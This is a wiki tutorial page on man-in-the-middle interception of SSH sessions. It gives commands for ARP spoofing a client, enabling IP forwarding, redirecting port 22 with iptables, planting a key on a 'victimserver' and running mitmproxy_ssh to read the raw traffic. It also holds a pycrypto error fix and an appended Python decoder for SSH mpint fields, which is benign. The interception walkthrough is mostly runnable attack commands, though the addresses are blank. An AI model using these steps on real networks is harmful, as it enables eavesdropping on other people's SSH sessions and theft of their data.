MITM: mitm ssh

From OnnoWiki



client --> mitmproxy --> ssh server

  • client IP: (for example)
  • server IP: (for example)


ARP Spoof

sudo su
arpspoof -t & >/dev/null

Configure the firewall so it can do NAT

sudo su
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222


cd /root/

Generate Keys

cd ~/mitmproxy-master/

The keys will be stored in


Install the SSH key on the server that will be attacked


ssh-copy-id -i ~/.mitmkeys/ user@victimserver


ssh-copy-id -i ~/.mitmkeys/ onno@

Run the proxy

Run the proxy and point it at victimserver.

cd ~/mitmproxy-master/
./mitmproxy_ssh -H victimserver
./mitmproxy_ssh -H -s 

This starts the proxy on localhost:2222.

You should be able to see it with

ssh localhost -p 2222

Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.


$ sudo pip install twisted
$ sudo apt-get install python-service-identity
$ pip install pycrypto

If an error occurs

./mitmproxy_ssh -H -s
Server running on localhost:2222...
Original client connected to proxy server.
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 84, in callWithContext
    return{ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
   File "/usr/lib/python2.7/dist-packages/twisted/internet/", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/", line 209, in doRead
    return self._dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/", line 215, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/", line 724, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/root/mitmproxy-master/mitmproxy/", line 1142, in dispatchMessage
  File "/root/mitmproxy-master/mitmproxy/", line 71, in log_packet
    self.output += func(payload)
  File "/root/mitmproxy-master/mitmproxy/", line 278, in msg_kexdh_init
    mpints, payload = get_mpint(payload)
  File "/root/mitmproxy-master/mitmproxy/", line 655, in get_mpint
exceptions.AttributeError: 'module' object has no attribute 'number'

Client disconnected. 

This happens because the structure of pycrypto changed. Edit the file mitmproxy/mitmproxy/

-- line 655: change to
-- line 11: add
from Crypto.Util import number as cnumber
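
The traceback above fails inside get_mpint while msg_kexdh_init is decoding the mpint carried in an SSH_MSG_KEXDH_INIT payload. As an added example (not code from mitmproxy or from this page), the following Python 3 code decodes that field with the standard library only, without pycrypto; the function bodies, the TruncatedMpint exception and the sample packet are constructed for illustration, and the test vectors are the ones listed in RFC 4251 section 5.

```python
import struct

SSH_MSG_KEXDH_INIT = 30  # message number from RFC 4253


class TruncatedMpint(ValueError):
    """The buffer ends before the length the mpint declares."""


def get_mpint(payload):
    """Decode one RFC 4251 mpint; return (value, remaining_bytes)."""
    if len(payload) < 4:
        raise TruncatedMpint("need 4 length bytes, got %d" % len(payload))
    (length,) = struct.unpack(">I", payload[:4])
    body = payload[4:4 + length]
    if len(body) != length:
        raise TruncatedMpint("declared %d bytes, got %d" % (length, len(body)))
    # Two's complement, big-endian; zero is encoded as a zero-length body.
    return int.from_bytes(body, "big", signed=True), payload[4 + length:]


def parse_kexdh_init(packet):
    """Return the client's DH public value e from message number + payload."""
    if not packet or packet[0] != SSH_MSG_KEXDH_INIT:
        raise ValueError("not an SSH_MSG_KEXDH_INIT message")
    e, rest = get_mpint(packet[1:])
    if rest:
        raise ValueError("%d unexpected trailing bytes" % len(rest))
    if e <= 0:  # RFC 4253 only allows e in the range [1, p-1]
        raise ValueError("e must be positive")
    return e


# Encodings and values listed in RFC 4251 section 5.
RFC4251_VECTORS = [
    ("00000000", 0),
    ("0000000809a378f9b2e332a7", 0x9A378F9B2E332A7),
    ("000000020080", 0x80),
    ("00000002edcc", -0x1234),
    ("00000005ff21524111", -0xDEADBEEF),
]

# Constructed sample: message number 30 followed by the mpint for e = 0x80.
SAMPLE_KEXDH_INIT = bytes([SSH_MSG_KEXDH_INIT]) + bytes.fromhex("000000020080")

if __name__ == "__main__":
    for hexstr, expected in RFC4251_VECTORS:
        value, rest = get_mpint(bytes.fromhex(hexstr))
        print(hexstr, "->", hex(value), "ok" if (value, rest) == (expected, b"") else "MISMATCH")
    print("e =", parse_kexdh_init(SAMPLE_KEXDH_INIT))
```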